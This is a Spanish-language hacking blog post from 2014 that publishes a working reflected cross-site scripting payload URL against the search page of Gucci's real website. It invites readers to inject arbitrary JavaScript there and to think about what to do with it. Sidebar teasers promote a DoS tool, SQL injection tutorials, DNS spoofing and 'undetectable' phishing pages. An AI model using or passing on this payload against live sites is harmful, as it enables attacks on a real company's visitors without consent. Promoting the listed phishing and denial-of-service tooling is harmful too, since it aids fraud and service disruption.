ANGEL WHITE "GALC PENTEST"

PENTEST - SEGURIDAD INFORMATICA Y HACKING

HACKER ANGELWHITE GALC

Página principal

viernes, 25 de julio de 2014

XSS] Gucci

Hola, aquí les dejo un XSS (Cros-Site Scripting) que encontré en Gucci pues simplemente les dejo el PoC
Vector -> http://www.gucci.com/es/search?query=%3CIMG+SRC%3D%2F+onerror%3D%22alert(String.fromCharCode(83,%20113,%20117,%20105,%20100,%2032,%2045,%2032,%2066,%20108,%2097,%2099,%20107,%2076,%2097,%20115,%20116,%2032,%2083,%20101,%2099))%22%3E%3C%2Fimg%3E

En el query inyectais cualquier código javascript y se ejecutará en bruto piensen que hacen con el

Un saludo

Publicado por http://pentest-angelwhite.blogspot.com/ en 20:46

Enviar por correo electrónico Escribe un blog Compartir con Twitter Compartir con Facebook Compartir en Pinterest

No hay comentarios:

Publicar un comentario

Entrada más reciente Entrada antigua Inicio

Suscribirse a: Enviar comentarios (Atom)

BIENVENIDO

Sign by Danasoft - Get Your Sign

La Anarquia de Codigo Abierto

Suscribirse a

Entradas

Entradas

Comentarios

Comentarios

Visualizacion de página

Los mas visitados

Hulk, herramientas para probar stress en servidores

La mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por l...
Utilizando la herramienta Dmitry PENTEST

Primero abriremos la Terminal y colocaremos lo siguiente. Dmitry y daremos enter y nos aparecerá las siguientes instrucciones....
Inyección SQLi Manual metod POST

Hola amigos de blacklast-security como verán en este post les vengo a explicar como explotar una base de datos mediante consultas y sent...
Inyección SQLi Manual Metodo (POST)

Hola amigos y lectores interesados en aprender...., en este post les vengo a explicar como explotar una Base De Datos manualmente per...
QUE ES LFI Y COMO SE REALIZA LA INYECCION

¿Que es? Lfi significa local file include y lo que hacemos en este tipo de vulnerabilidad es pedir un archivo local por medio de la url...
DNS SPOOFING con Social Engineering Toolkit "herramienta echa por "Kevin David Mitnick"

Social Engineering Toolkit se basa en muchos módulos y menús es una herramienta echa por "Kevin David Mitnick" un cra...
[Privacidad y Anonimato ] Instalación y creación de un volumen estandar

Buenos días amiguitos de la privacidad! Lo primero de todo es dar la gracias por la buena acogida de la entrada anterior sobre cifrado de co...
cifrar correos

Mailvelope es una extensión gratuita que permite cifrar con PGP usando los servicios de Gmail, Yahoo, Outlook y otros. El proceso para usarl...
ExifTool by Phil Harvey

ExifTool is a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wid...
Gray Fish: Páginas de Phishing Totalmente Indetectables

Gray Fish proporciona páginas de phishing totalmente indetectables. ¿Estás aburrido de que un enlace sea bloqueado por Facebook u otros s...

Seguidores

Social Icons

small picture right tab

big picture slidearea

Archivos

► 2021 (4)
- ► marzo (2)
- ► enero (2)

► 2020 (97)
- ► julio (46)
- ► junio (51)

► 2019 (1)
- ► enero (1)

► 2018 (12)
- ► abril (1)
- ► marzo (4)
- ► febrero (1)
- ► enero (6)

► 2017 (152)
- ► noviembre (10)
- ► octubre (16)
- ► septiembre (9)
- ► agosto (20)
- ► julio (14)
- ► junio (18)
- ► mayo (22)
- ► marzo (18)
- ► febrero (8)
- ► enero (17)

► 2016 (46)
- ► diciembre (4)
- ► noviembre (19)
- ► octubre (8)
- ► septiembre (1)
- ► agosto (6)
- ► julio (2)
- ► junio (1)
- ► mayo (1)
- ► abril (2)
- ► marzo (2)

► 2015 (112)
- ► noviembre (17)
- ► octubre (6)
- ► septiembre (13)
- ► agosto (3)
- ► julio (3)
- ► junio (1)
- ► mayo (18)
- ► abril (7)
- ► marzo (13)
- ► febrero (6)
- ► enero (25)

▼ 2014 (252)
- ► diciembre (13)
- ► noviembre (14)
- ► octubre (10)
- ► septiembre (35)
- ► agosto (21)
- ▼ julio (16)
- ► junio (2)
- ► mayo (23)
- ► abril (96)
- ► marzo (22)

Pagina Amiga

Blogroll

Pages - Menu

Página principal

Increinfo Team

http://pentest-angelwhite.blogspot.com/

Ver todo mi perfil

Featured Posts

Social Icons

Archivo del blog

Angel White Hacker Colombiano . Tema Picture Window. Con la tecnología de Blogger.